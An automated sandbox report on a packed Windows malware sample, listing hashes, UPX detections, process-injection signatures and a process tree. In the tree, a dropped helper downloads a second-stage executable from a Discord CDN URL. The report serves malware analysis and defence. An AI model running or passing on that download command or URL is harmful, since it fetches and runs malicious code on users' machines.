13f5e3ba22a40f62d45a4bd616b1aee2ba2391557dab8a3a90170ad9cd59c72d

Analysis

max time kernel
137s
max time network
134s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
29/12/2023, 22:11

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

05459f1150d7b51d7b7b69528d402577.exe
Size

463KB
MD5

05459f1150d7b51d7b7b69528d402577
SHA1

e384ebda79a72d8756d8cbe60361f994e0f0fae5
SHA256

13f5e3ba22a40f62d45a4bd616b1aee2ba2391557dab8a3a90170ad9cd59c72d
SHA512

19e6b7ce50be092e99bf4f4ec7742eaf5bee1e32e640b2fe41fc2e93cd259772c68a35eddcfd81662dbb45edd81d758fb3a9b6662a635526bc625e3b9ddb13cd
SSDEEP

12288:jbjDhu9T2gBxZ6M6FkGuvbIy2w2AtZTYQi/b5KKCN+ceq:j1eT2YzyVuT2w2AtZcFz5KK5W

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
1620	extd.exe
2136	extd.exe
2760	extd.exe
2596	extd.exe

Loads dropped DLL 8 IoCs

pid	Process
1728	cmd.exe
1728	cmd.exe
1728	cmd.exe
1728	cmd.exe
1728	cmd.exe
1728	cmd.exe
1728	cmd.exe
1728	cmd.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000014b87-3.dat	upx
behavioral1/memory/1620-8-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/1620-9-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2136-13-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/files/0x0007000000014b87-12.dat	upx
behavioral1/files/0x0007000000014b87-11.dat	upx
behavioral1/memory/2136-14-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/files/0x0007000000014b87-19.dat	upx
behavioral1/files/0x0007000000014b87-18.dat	upx
behavioral1/memory/1728-20-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/files/0x0007000000014b87-21.dat	upx
behavioral1/memory/2760-23-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/files/0x0007000000014b87-30.dat	upx
behavioral1/memory/1728-33-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2596-31-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/files/0x0007000000014b87-29.dat	upx
behavioral1/memory/2596-34-0x0000000140000000-0x00000001400D8000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 1728	1976	05459f1150d7b51d7b7b69528d402577.exe	28
PID 1976 wrote to memory of 1728	1976	05459f1150d7b51d7b7b69528d402577.exe	28
PID 1976 wrote to memory of 1728	1976	05459f1150d7b51d7b7b69528d402577.exe	28
PID 1728 wrote to memory of 1620	1728	cmd.exe	30
PID 1728 wrote to memory of 1620	1728	cmd.exe	30
PID 1728 wrote to memory of 1620	1728	cmd.exe	30
PID 1728 wrote to memory of 2136	1728	cmd.exe	31
PID 1728 wrote to memory of 2136	1728	cmd.exe	31
PID 1728 wrote to memory of 2136	1728	cmd.exe	31
PID 1728 wrote to memory of 2760	1728	cmd.exe	32
PID 1728 wrote to memory of 2760	1728	cmd.exe	32
PID 1728 wrote to memory of 2760	1728	cmd.exe	32
PID 1728 wrote to memory of 2596	1728	cmd.exe	33
PID 1728 wrote to memory of 2596	1728	cmd.exe	33
PID 1728 wrote to memory of 2596	1728	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\05459f1150d7b51d7b7b69528d402577.exe
"C:\Users\Admin\AppData\Local\Temp\05459f1150d7b51d7b7b69528d402577.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\538E.bat C:\Users\Admin\AppData\Local\Temp\05459f1150d7b51d7b7b69528d402577.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:1620
- - C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2136
- - C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/872167745591066685/417686867.exe" "417686867.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2760
- - C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\538E.bat

Filesize
940B

MD5
6dda89b6c919807375828125970a9277

SHA1
6495f4b3f3d4c7c2d24f1cc26208c55f81cda5f9

SHA256
c1fb06abba8e35f2b3c0bc89f21c4702e87c7b5f55071861d19ddcf31010b77f

SHA512
68f40597f76bde8e5b882471d6c90aa8a0c8156f5bb25a5296a9c9300ab036e6dd9d4b1e6696f9162246b355480903406202ec9719cf67f5009d185cea7bfd3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
179KB

MD5
9cdfd46e21ac5ecc6cccf629fc35a421

SHA1
c69b459f5b287b420c0c2b320b237c893377bf5f

SHA256
f1eb1c52e85f00ba86b851c7bcdcd4a1ed47eeebb677c6c0643dc05072b7cc9d

SHA512
5b2d2df02b5467016ab8abcdf023a9da8f598eccce888610c157431f9f3600f83bed9e44417c02104a2f54b75eac3b0b3ed03c3fcc854ba8b7a9258f02ad2083

Download Submit
C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
152KB

MD5
8003d787ececb6ff435d0dc3b5057f52

SHA1
f64db53615396d064c094340a19dcba5a666b445

SHA256
b2ed4961d8a3ee85120aa7fa9ccf7ad8cd788815061e3aa6a9b0d59f307be404

SHA512
72bc8b6d04ab9c4a0ea078d4bf1d618340621d17e8ccfdc1287ffb60774f5b16ac83d8c53e4e76758a6c6b0a38ae4c5336ace2df9a92e99796391b9d03ccceb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
247KB

MD5
505fe48279e7f9dd121f18fa7dcfc96a

SHA1
c64a179f82f1790011346981b50069d0c3559558

SHA256
fa183312e85a231e7f1ecfa07f34f3b3efc9c122c62022d6acfcd3d3bce6ccd8

SHA512
71c22b29308660eff376aadeac9f4b751f5dbad40021989ab96f4353b5c9de4b270635b3d95add57397cc08bc877739634789eadf981f69c5d8e4a303bc49f03

Download Submit
\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
202KB

MD5
970b6070a7b060d583dce50e6f1dd2c1

SHA1
6e6776547ae366749b2200c6f358b45f49e83413

SHA256
ea71d415623d0d78d3c5b20f39cd8d32443759419c104c23c470dda3cfd7d59f

SHA512
c96102f9019ead141f089de4180680fc3ce3b12f166654c5da1ade2d96869a3e74c097967cf4a6de5c963862dcbd6e542ac2f9254594374515b3190bea1b61de

Download Submit
\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
144KB

MD5
a8988170d726b734d7bd04cb76857eca

SHA1
6169ac7a9c92ff22eb607c015e156a06d6c8e3a2

SHA256
8f2b41138a6bca97cc2fc6bcaca45bb7b4efc9943bcc68447a89dfbe0d814d2d

SHA512
ac3ce72935152ea9675acdf0845aaa0d9186355ec21aeec3c043bf96c7704f4adea1fd0ce239aeab3dae12e2776bc2082fb67a6e773d71f907c4470fe73fa698

Download Submit
\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
136KB

MD5
22163aa81d41cc29083dec5ad1392b8c

SHA1
5e3043e4f9a61275d488be7d98b20dc7bc13e969

SHA256
41b24fd55030b0b7f4c303736a4fb138b9697b462c179db1ff393bbfb1463388

SHA512
d9099c24244f4057825f7f328c2f152e1fc5bb98d5fcc877869882e4a5bcdfa41fe0fb2d84b6198a4c889497f0b615b1e5f39e19ff704ae974a8b4c45144164a

Download Submit
\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
259KB

MD5
68d055e5fdfa7cd3c8248194688e1c77

SHA1
c97dfdbb0907119d30711eaa735617f449a91e77

SHA256
c3352ecb8286496228f5b4a72cfe867c7e947232bf8f382e236ed6bb50699063

SHA512
4843074e4ba16191c61b5de629ab71f98aa9f3ba62868e5b55e9b4bff9a46280e3fdce3b04201ec922607ec2d4b28659cd70d3f8556949475d9c5795a0649ac9

Download Submit
\Users\Admin\AppData\Local\Temp\537D.tmp\538D.tmp\extd.exe

Filesize
326KB

MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
memory/1620-8-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/1620-9-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/1728-32-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/1728-20-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/1728-33-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/1728-6-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2136-14-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2136-13-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2596-31-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2596-34-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/2760-23-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download